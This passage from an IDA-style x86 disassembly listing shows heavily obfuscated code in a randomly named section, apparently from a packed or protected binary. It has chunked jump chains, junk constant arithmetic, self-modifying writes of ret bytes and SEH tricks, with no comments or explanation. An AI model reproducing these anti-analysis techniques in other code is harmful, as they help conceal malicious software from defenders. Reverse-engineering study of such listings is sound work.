; FUNCTION CHUNK AT 00439F50 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0043ACBD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B52E SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043C702 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EBF5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044070A SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00440BD7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441048 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00442C48 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044343A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446466 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00447875 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00447F1E SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044BA35 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C7A0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044D4A6 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044D709 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E18B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F7DA SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044FD56 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00450214 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00450D72 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004514D9 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004525F2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004549A6 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004560D6 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0045637E SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045901C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459F02 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00459F3B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045ABE1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045ACFC SIZE 0000000B BYTES

		xchg	edx, [esp+0]
		pop	edx
		xchg	ebx, [esp-4+arg_0]
		mov	ebp, ebx
		pop	ebx
		push	7DBD983Bh
		jmp	loc_43B52E
sub_43B6A5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43B6B9:				; CODE XREF: hvvrg7ie:0043C828j
					; hvvrg7ie:0045B186j
		add	edx, 8768C702h
		xchg	edx, [esp]
		jmp	loc_44DBBC
; ---------------------------------------------------------------------------

loc_43B6C7:				; CODE XREF: hvvrg7ie:0043DFBEj
		jz	loc_44D959
		jmp	loc_454898
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_43B6D2:				; CODE XREF: sub_445CCD+6521j
					; sub_45541B:loc_459466j
		cmp	dword ptr [ebp-1C8h], 2B584245h
		jnz	loc_4426C4
		jmp	loc_44ED4B
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446072

loc_43B6E7:				; CODE XREF: sub_446072:loc_43E5CCj
					; hvvrg7ie:00450118j
		pop	edi
		and	edi, 0AD4A0DDFh
		add	edi, 659B564Ch
		or	edi, 0F363E492h
		sub	edi, 2110CED1h
		xor	edi, 0EA888B9h
		xor	eax, edi
		jmp	loc_443D8B
; END OF FUNCTION CHUNK	FOR sub_446072
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45889B

loc_43B70D:				; CODE XREF: sub_45889B:loc_454025j
		mov	dword ptr [ebp-20h], 1

loc_43B714:				; CODE XREF: sub_45889B-1F054j
		jnz	loc_44E3D1
		mov	eax, [ebp-18h]
		test	dword ptr [eax], 0FFFF0000h
		jnz	loc_43983D

loc_43B729:				; CODE XREF: hvvrg7ie:0043CB80j
		jmp	loc_4467B2
; END OF FUNCTION CHUNK	FOR sub_45889B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448663

loc_43B72E:				; CODE XREF: sub_448663:loc_440BD2j
					; hvvrg7ie:0044B2CAj
		jz	loc_451C2C

loc_43B734:				; CODE XREF: hvvrg7ie:0044DB7Fj
		jmp	loc_44414B
; END OF FUNCTION CHUNK	FOR sub_448663
; ---------------------------------------------------------------------------
		xor	ebp, ebx
		rol	edx, 16h
		jmp	sub_43C8E0

; =============== S U B	R O U T	I N E =======================================



sub_43B743	proc near		; DATA XREF: sub_4592BFo
		push	ebp
		push	offset loc_4467E0
		jmp	nullsub_524
sub_43B743	endp

; ---------------------------------------------------------------------------

loc_43B74E:				; CODE XREF: hvvrg7ie:loc_441E8Ej
		adc	ebx, ecx
		rol	edx, 0Dh
		jmp	loc_4469D9
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_76. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4569F5

loc_43B759:				; CODE XREF: sub_4569F5+7j
		jmp	loc_44CA20
; END OF FUNCTION CHUNK	FOR sub_4569F5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450590

loc_43B75E:				; CODE XREF: sub_450590+Dj
		jmp	loc_43AF69
; END OF FUNCTION CHUNK	FOR sub_450590
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D3B5

loc_43B763:				; CODE XREF: sub_43D3B5+17j
		jmp	loc_44BA48
; END OF FUNCTION CHUNK	FOR sub_43D3B5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_43B768:				; CODE XREF: sub_456F9F:loc_44328Dj
		call	sub_43A088

loc_43B76D:				; CODE XREF: sub_440B13+18E92j
		jmp	loc_44E39C
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------
		jmp	loc_45A015
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A3D5

loc_43B777:				; CODE XREF: sub_43A3D5+15j
		jmp	loc_43FFDF
; END OF FUNCTION CHUNK	FOR sub_43A3D5
; ---------------------------------------------------------------------------

loc_43B77C:				; CODE XREF: hvvrg7ie:00454684j
		jo	loc_43F7A1
		jnb	loc_4546F9

; =============== S U B	R O U T	I N E =======================================



sub_43B788	proc near		; CODE XREF: sub_44BCAE-4BC1p

; FUNCTION CHUNK AT 0043FA7C SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	eax, 2C5904C6h
		call	sub_44059F
		push	offset loc_457240
		jmp	loc_43FA7C
sub_43B788	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43B7A1:				; CODE XREF: hvvrg7ie:0043AA57j
		mov	ecx, eax
		xchg	ecx, [esp]
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4466CE

loc_43B7A7:				; CODE XREF: sub_4466CE+9A5Ej
		jmp	sub_4585EE
; END OF FUNCTION CHUNK	FOR sub_4466CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4442B9

loc_43B7AC:				; CODE XREF: sub_4442B9-4B83j
		jmp	loc_4521AD
; END OF FUNCTION CHUNK	FOR sub_4442B9

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_43B7B1	proc near		; CODE XREF: sub_44543A-3C93p
					; sub_4504ADp

; FUNCTION CHUNK AT 0043A4CF SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00449339 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_449339
sub_43B7B1	endp


; =============== S U B	R O U T	I N E =======================================



sub_43B7B9	proc near		; CODE XREF: sub_45046Bp

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 00439370 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C1D8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0043D4E5 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00440725 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044136D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448742 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 0044D251 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045170B SIZE 00000020 BYTES
; FUNCTION CHUNK AT 00451F37 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00457AF1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B122 SIZE 0000000A BYTES

		xchg	esi, [esp+0]
		pop	esi
		jb	loc_45B122
		xchg	ecx, [esp-4+arg_0]
		mov	edx, ecx
		pop	ecx
		jmp	loc_43D4E5
sub_43B7B9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	edx, [ebx]
		pushf
; START	OF FUNCTION CHUNK FOR sub_4413A5

loc_43B7D1:				; CODE XREF: sub_4413A5:loc_44A0A1j
		jmp	sub_43D052
; END OF FUNCTION CHUNK	FOR sub_4413A5
; ---------------------------------------------------------------------------

loc_43B7D6:				; CODE XREF: hvvrg7ie:0044B161j
		jb	loc_441F12
		pushf
		sub	edx, 0FD654DD2h

loc_43B7E3:				; CODE XREF: hvvrg7ie:loc_453CC1j
		push	ecx
		push	7930B4D6h
		jmp	loc_4545AE
; ---------------------------------------------------------------------------

loc_43B7EE:				; CODE XREF: hvvrg7ie:loc_43E717j
		or	ecx, ebp
		jmp	loc_4462C3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_186. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4563DC

loc_43B7F6:				; CODE XREF: sub_4563DC-17455j
		jmp	nullsub_550
; END OF FUNCTION CHUNK	FOR sub_4563DC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_43B7FB:				; CODE XREF: sub_43C0DE:loc_43D1EBj
		jmp	loc_4390C8
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D980

loc_43B800:				; CODE XREF: sub_43D980:loc_439C45j
					; hvvrg7ie:0043F174j
		sub	edx, ds:4000FAh
		push	offset loc_4402D7
		jmp	nullsub_34
; END OF FUNCTION CHUNK	FOR sub_43D980
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D47A

loc_43B810:				; CODE XREF: sub_44D47A:loc_44430Bj
		jz	loc_45AC92
		jmp	loc_43EB6C
; END OF FUNCTION CHUNK	FOR sub_44D47A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C61

loc_43B81B:				; CODE XREF: sub_440C61:loc_446911j
		jge	loc_455760
; END OF FUNCTION CHUNK	FOR sub_440C61
; START	OF FUNCTION CHUNK FOR sub_43B8A5

loc_43B821:				; CODE XREF: sub_43B8A5+7B35j
		jmp	loc_453E30
; END OF FUNCTION CHUNK	FOR sub_43B8A5
; ---------------------------------------------------------------------------
		push	esi
		jmp	loc_455759
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448BC0

loc_43B82C:				; CODE XREF: sub_448BC0:loc_45A9BDj
		mov	edi, ecx
		xchg	edi, [esp+0]
		push	890EBBBEh
		pop	ecx
		add	ecx, 6E78DA9Eh
		rol	ecx, 19h
		cmp	ecx, 0E05611FBh
		jmp	loc_43E5E7
; END OF FUNCTION CHUNK	FOR sub_448BC0
; ---------------------------------------------------------------------------

loc_43B84B:				; CODE XREF: hvvrg7ie:00443FB5j
		jg	loc_447F19

; =============== S U B	R O U T	I N E =======================================



sub_43B851	proc near		; CODE XREF: sub_458175-CF53p

; FUNCTION CHUNK AT 0043DEDC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043ECFB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440B55 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C76C SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00454FBC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00458BF9 SIZE 0000000E BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	eax
		jmp	loc_454FBC
sub_43B851	endp


; =============== S U B	R O U T	I N E =======================================



sub_43B85B	proc near		; DATA XREF: hvvrg7ie:0044144Bo
		mov	ds:dword_458D88, eax
		retn
sub_43B85B	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4406E9

loc_43B862:				; CODE XREF: sub_4406E9+16j
		jmp	loc_459FB7
; END OF FUNCTION CHUNK	FOR sub_4406E9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4424A6

loc_43B867:				; CODE XREF: sub_4424A6-53AEj
		jmp	loc_43F39B
; END OF FUNCTION CHUNK	FOR sub_4424A6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ECAA

loc_43B86C:				; CODE XREF: sub_43ECAA+262Aj
		rol	eax, 3
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43ECAA
; ---------------------------------------------------------------------------

loc_43B871:				; CODE XREF: hvvrg7ie:00459B0Dj
		jmp	loc_43C2E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_43B876:				; CODE XREF: sub_4403B6-4E53j
		jmp	loc_459B12
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451442

loc_43B87B:				; CODE XREF: sub_451442-7BC2j
		push	edi
		jmp	loc_441F0A
; END OF FUNCTION CHUNK	FOR sub_451442
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D4D2

loc_43B881:				; CODE XREF: sub_43D4D2:loc_44D387j
		mov	eax, 0EEE68DF1h
		push	ebx
		call	sub_44E6A5

loc_43B88C:				; CODE XREF: hvvrg7ie:0044D9F9j
		jmp	loc_43A136
; END OF FUNCTION CHUNK	FOR sub_43D4D2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445488

loc_43B891:				; CODE XREF: sub_445488+1Ej
		jmp	loc_445CFF
; END OF FUNCTION CHUNK	FOR sub_445488
; ---------------------------------------------------------------------------

loc_43B896:				; CODE XREF: hvvrg7ie:0044175Bj
		jmp	loc_439BD2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4399AE

loc_43B89B:				; CODE XREF: hvvrg7ie:00446889j
					; sub_4399AE:loc_45736Cj
		push	offset loc_43ECE9
		jmp	nullsub_270
; END OF FUNCTION CHUNK	FOR sub_4399AE

; =============== S U B	R O U T	I N E =======================================



sub_43B8A5	proc near		; CODE XREF: sub_446D8D:loc_43DCDBp
					; hvvrg7ie:00459618j

; FUNCTION CHUNK AT 0043B821 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C2E9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043E279 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 004433C3 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00451CDB SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00454AD7 SIZE 00000019 BYTES

		xchg	edx, [esp+0]
		pop	edx
		call	sub_457C82
		jmp	loc_43E279
sub_43B8A5	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_514. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45AD46

loc_43B8B4:				; CODE XREF: sub_45AD46-193D5j
		jmp	loc_458730
; END OF FUNCTION CHUNK	FOR sub_45AD46
; ---------------------------------------------------------------------------

loc_43B8B9:				; CODE XREF: hvvrg7ie:0044DD06j
		call	nullsub_15

loc_43B8BE:				; CODE XREF: hvvrg7ie:loc_446E08j
		jmp	loc_45B16E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45202B

loc_43B8C3:				; CODE XREF: sub_45202B-1424Aj
		jz	loc_4485C2
		jmp	loc_4470C5
; END OF FUNCTION CHUNK	FOR sub_45202B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4589D3

loc_43B8CE:				; CODE XREF: sub_4589D3-1B31Cj
		xor	esi, 0FEB44EC0h
		or	esi, 0B1BCC9A7h
		rol	esi, 2
		add	esi, 14A21D4h
		xchg	esi, [esp+0]
		jmp	sub_451703
; END OF FUNCTION CHUNK	FOR sub_4589D3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4414F6

loc_43B8EB:				; CODE XREF: sub_4414F6+4CF3j
		pop	esi

loc_43B8EC:				; CODE XREF: hvvrg7ie:loc_44CE8Aj
		sub	esi, 14D64B3Ch
		add	esi, 0C1FB54EBh
		xchg	esi, [esp-4+arg_0]
		jmp	loc_44113C
; END OF FUNCTION CHUNK	FOR sub_4414F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FE9B

loc_43B900:				; CODE XREF: sub_43FE9B+3790j
		mov	[ecx+0B8h], eax
		pop	ecx
		xor	eax, eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43FE9B
; ---------------------------------------------------------------------------

loc_43B90A:				; CODE XREF: hvvrg7ie:loc_455DA3j
		jmp	loc_43D390
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4557D4

loc_43B90F:				; CODE XREF: sub_4557D4-5C6Cj
		jmp	loc_458205
; END OF FUNCTION CHUNK	FOR sub_4557D4

; =============== S U B	R O U T	I N E =======================================



sub_43B914	proc near		; CODE XREF: sub_45B048:loc_439CFBj
					; sub_45B048-ADC4j ...

; FUNCTION CHUNK AT 004514D4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452F02 SIZE 0000000A BYTES

		pop	large dword ptr	fs:0
		jmp	loc_4514D4
sub_43B914	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_43B920:				; CODE XREF: hvvrg7ie:loc_43F26Dj
		xor	ebp, 0B090994Bh
		jle	loc_453C8D
		ja	loc_441ACC
		jmp	loc_441304
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E60A

loc_43B937:				; CODE XREF: sub_45006C:loc_44BF61j
					; sub_43E60A:loc_450C47j
		jnz	loc_44442C

loc_43B93D:				; CODE XREF: sub_452AE5+1AC4j
		jmp	loc_441551
; END OF FUNCTION CHUNK	FOR sub_43E60A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449007

loc_43B942:				; CODE XREF: sub_449007-1929j
		jmp	loc_445994
; END OF FUNCTION CHUNK	FOR sub_449007
; ---------------------------------------------------------------------------
		test	edi, 2D3386B0h
		jmp	loc_444420
; ---------------------------------------------------------------------------

loc_43B952:				; DATA XREF: sub_4405AA:loc_4436A4o
		mov	eax, [esp]
		push	ebx
		mov	ebx, edi
		xchg	ebx, [esp]
		mov	edi, edx
		xchg	edi, [esp]
		jmp	loc_448AA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456881

loc_43B965:				; CODE XREF: sub_456881:loc_43D69Ej
		jz	loc_448D97
		adc	esi, 0FBB47D5Fh
		mov	eax, 655ADCC8h
		and	ebx, 43E3A01Dh
		rol	edi, 17h
		jmp	loc_43B59E
; END OF FUNCTION CHUNK	FOR sub_456881
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450434

loc_43B984:				; CODE XREF: sub_450434+9j
		jz	loc_43F1E9
		sub	al, 99h
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_439017
		jmp	loc_44FC42
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------
		mov	ds:off_41D074, eax
		lea	eax, loc_459918
		push	offset sub_43A0B6
		jmp	loc_44BF84
; ---------------------------------------------------------------------------

loc_43B9B4:				; CODE XREF: hvvrg7ie:00441F05j
		push	ecx
; START	OF FUNCTION CHUNK FOR sub_4414D3

loc_43B9B5:				; CODE XREF: sub_4414D3:loc_441EF0j
		and	eax, 1D9CF229h
		add	eax, 0E34338CBh
		xchg	eax, [esp+8+var_8]
		jmp	sub_43E7F3
; END OF FUNCTION CHUNK	FOR sub_4414D3

; =============== S U B	R O U T	I N E =======================================



sub_43B9C9	proc near		; CODE XREF: sub_44D98D:loc_44E871p
					; hvvrg7ie:0045AD28j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00439973 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00440037 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044705B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004494B4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CB70 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044FB29 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 004514C0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00454298 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004559D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A25B SIZE 00000007 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	edi, 0C38CB216h
		call	sub_449924

loc_43B9D8:				; CODE XREF: sub_45560E+12j
		jmp	loc_44FB29
sub_43B9C9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_43B9DD:				; CODE XREF: sub_454099-F33Cj
		jmp	loc_454507
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44955C

loc_43B9E2:				; CODE XREF: sub_44955C+Bj
		pop	eax
		add	eax, 32692264h
		jns	loc_44D3BA
		cmp	ebx, 641C2A8Ch
		jmp	loc_44B054
; END OF FUNCTION CHUNK	FOR sub_44955C

; =============== S U B	R O U T	I N E =======================================



sub_43B9FA	proc near		; DATA XREF: sub_451C09+2o

arg_4		= dword	ptr  8

		call	sub_44A2D1
		mov	esp, [esp+arg_4]
sub_43B9FA	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_439873

loc_43BA03:				; CODE XREF: sub_439873+177A4j
					; hvvrg7ie:004523FCj ...
		xor	eax, eax

loc_43BA05:				; CODE XREF: hvvrg7ie:loc_43AEC4j
					; sub_439873:loc_44C665j
		pop	large dword ptr	fs:0
		pop	edx
		call	sub_44A2CA

loc_43BA12:				; CODE XREF: sub_44D671+B15j
		jmp	loc_440904
; END OF FUNCTION CHUNK	FOR sub_439873
; ---------------------------------------------------------------------------
		jmp	ds:off_41D098
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_43BA1D:				; CODE XREF: sub_4465A6+53ADj
					; sub_4465A6+6FDEj ...
		xchg	ebp, [esp+4+var_4]
		mov	edx, ebp
		pop	ebp
		jz	loc_44B958
		jmp	loc_43A805
; END OF FUNCTION CHUNK	FOR sub_4465A6

; =============== S U B	R O U T	I N E =======================================



sub_43BA2E	proc near		; DATA XREF: hvvrg7ie:0044D692o
		add	esi, 94A51BAh
		mov	[esi], eax
		pop	esi
		push	offset loc_440434
		jmp	loc_439D20
sub_43BA2E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447E56

loc_43BA41:				; CODE XREF: sub_447E56:loc_444B70j
		pop	edx
		mov	eax, [esp+0]
		push	edx
		call	sub_44F7CF
		mov	eax, 3195933h
		push	ecx
		jmp	loc_442AB3
; END OF FUNCTION CHUNK	FOR sub_447E56

; =============== S U B	R O U T	I N E =======================================



sub_43BA56	proc near		; CODE XREF: sub_452AA0:loc_443D21p
					; hvvrg7ie:0044793Aj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044C2C6 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	esi, 43CD72FCh
		xchg	esi, [esp-4+arg_0]
		jmp	loc_44C2C6
sub_43BA56	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458591

loc_43BA68:				; CODE XREF: sub_458591-1198Aj
		sbb	ecx, 4B53D0D0h

loc_43BA6E:				; CODE XREF: sub_458591:loc_446BF5j
		xor	edi, 3CF253E1h
		push	offset sub_44A0E6
		jmp	loc_44877E
; END OF FUNCTION CHUNK	FOR sub_458591
; ---------------------------------------------------------------------------
		mov	[ebx], edi
		jmp	sub_459B45
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FA76

loc_43BA85:				; CODE XREF: sub_44FA76+2DACj
		mov	ebp, edi
		pop	edi
		retn
; END OF FUNCTION CHUNK	FOR sub_44FA76
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E0C0

loc_43BA89:				; CODE XREF: sub_44E0C0+13j
		jmp	loc_44F6A0
; END OF FUNCTION CHUNK	FOR sub_44E0C0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BDC2

loc_43BA8E:				; CODE XREF: sub_43BDC2+9C63j
		jmp	loc_440699
; END OF FUNCTION CHUNK	FOR sub_43BDC2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A2CE

loc_43BA93:				; CODE XREF: sub_45A2CE-1CD6Aj
		jmp	loc_453328
; END OF FUNCTION CHUNK	FOR sub_45A2CE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_43BA98:				; CODE XREF: sub_43D285+1D6C9j
					; sub_454D23+634Fj
		call	nullsub_2
		call	sub_439549
		test	al, al
		jmp	loc_44408E
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
		cmp	edx, eax
		jmp	loc_44D987
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_43BAB0:				; CODE XREF: sub_449425-67E2j
		jz	loc_4560C6
		jmp	loc_4443B3
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_43BABB:				; CODE XREF: sub_44D2F8-8898j
		jz	loc_4473B0
		jmp	loc_44BB8C
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		sub	ebx, 1DBD35C2h
		jmp	sub_44ED23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_43BAD1:				; CODE XREF: sub_440C05+156E8j
		jle	loc_43FA17
		mov	ecx, 85A031DAh
		xor	eax, ebx

loc_43BADE:				; CODE XREF: sub_440C05:loc_439B1Ej
		push	7E53630Fh
		xchg	edx, [esp+0]
		mov	eax, edx
		jmp	loc_45316B
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454099

loc_43BAED:				; CODE XREF: sub_454099-A57Cj
		jz	loc_459C87
		push	0F95A4E50h
		or	edi, ebp
		pop	ecx
		jmp	loc_459C87
; END OF FUNCTION CHUNK	FOR sub_454099
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_43BB00:				; CODE XREF: sub_453422:loc_44CB85j
		cmp	dword ptr [ebp-8], 0
		jbe	loc_44529C
		jmp	loc_447DDF
; END OF FUNCTION CHUNK	FOR sub_453422
; ---------------------------------------------------------------------------

loc_43BB0F:				; CODE XREF: hvvrg7ie:loc_457081j
		mov	[ecx], eax
		pop	ecx
		lea	eax, loc_446D27
		mov	byte ptr [eax],	0C3h
		jmp	loc_44FC94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_43BB20:				; CODE XREF: sub_448100+15DAj
		jz	loc_45ABCA
		and	ebp, 3D4C810Ch

loc_43BB2C:				; CODE XREF: sub_450BDE:loc_440E66j
		rol	esi, 0Fh
		xor	esi, 0E25B0A76h
		cmp	esi, 21417BB3h
		jmp	loc_44FD10
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4498AE

loc_43BB40:				; CODE XREF: sub_4498AE:loc_442C95j
		push	edx
		call	sub_447B07
		mov	eax, 0A7C2536Ch
		call	sub_450C5A
		mov	ds:off_41D054, eax
		lea	eax, sub_448881
		mov	byte ptr [eax],	0C3h
		jmp	loc_4540CC
; END OF FUNCTION CHUNK	FOR sub_4498AE
; ---------------------------------------------------------------------------
		call	nullsub_346
		jmp	loc_454628
; ---------------------------------------------------------------------------

loc_43BB6E:				; CODE XREF: hvvrg7ie:00440FF0j
		jnp	loc_45A79E
		add	ebp, edx
; START	OF FUNCTION CHUNK FOR sub_452C40

loc_43BB76:				; CODE XREF: sub_452C40-199ECj
		or	eax, 0D79EB5B3h
		xor	eax, 0A5B1A2BDh
		call	sub_450C5A
		push	eax
		mov	eax, ebx
		xchg	eax, [esp+0]
		jmp	loc_44791E
; END OF FUNCTION CHUNK	FOR sub_452C40
; ---------------------------------------------------------------------------

loc_43BB92:				; CODE XREF: hvvrg7ie:00443E46j
					; hvvrg7ie:loc_44E649j
		jz	loc_43B4CB
		jmp	loc_4509FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D3B5

loc_43BB9D:				; CODE XREF: sub_43D3B5+16D72j
		lea	eax, nullsub_507
		call	sub_44B3E5
; END OF FUNCTION CHUNK	FOR sub_43D3B5
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_43BBA8:				; CODE XREF: sub_44BCAE+E322j
		jmp	nullsub_460
; END OF FUNCTION CHUNK	FOR sub_44BCAE
